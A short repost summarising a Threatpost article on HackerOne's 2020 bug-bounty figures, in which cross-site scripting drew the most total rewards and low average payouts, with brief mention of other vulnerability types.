One of the starkest vulnerabilities of 2020 is cross-site scripting (XSS). It has earned the highest rewards for ethical hacking last year. It has acquired the most elevated position in the list of top 10 vulnerabilities uncovered by HackerOne, a company that hosts global bug bounty programs. It maintains a database of 200,000 vulnerabilities found by ethical hackers. The ranking is based on the total number of bounties awarded to ethical hackers as of April 2020. In this article at Threatpost, Elizabeth Montalbano shares the facts and figures of the ethical hacking progress.
The Potential Spike
The XSS cyber vulnerability has helped threat actors to infuse malicious scripts into potential victims’ web pages. Thus, it has enabled ethical hackers to earn $4.2 million in total bug-bounty awards in 2020. That is a sharp spike of 26 percent from the amount paid to them in 2019 for uncovering the XSS flaws, unveils a media report.
According to HackerOne, global organizations have paid about $23.5 million in bug bounties to ethical hackers for all the flaws they have uncovered in 2020. The cyber intruders use XSS vulnerabilities to access and control online user accounts to steal personal data, including passwords, bank account numbers, credit cards, and so on.
Though they account for about 18 percent of all cyber vulnerabilities reported so far, the ethical hackers are underpaid for finding them, per HackerOne. The bug-bounty award for exposing a cross-site scripting error is approximately $501, far less than $3,650 prize on average for discovering a crucial flaw. Thus, ethical hackers enable global organizations to mitigate the common XSS bug at an inexpensive rate.
Experts believe that ethical hackers get a high price for identifying unique vulnerabilities. Miju Han, Senior Director of Product Management for HackerOne, believes that the most common vulnerabilities are inexpensive. So, only the top three vulnerabilities, including improper access control, server-side request forgery (SSRF), and information disclosure, received a hike of over 10 percent bounty awards in 2020. The figures validate how a cost-effective value proposition can influence ethical hackers to expose the potential bugs in your IT infrastructure.
Click on the following link to read the original article: https://threatpost.com/bug-bounty-awards-spike-2020/160719/
The post Bug Bounty Awards to Laud Ethical Hacker’s Potential appeared first on AITS CAI’s Accelerating IT Success.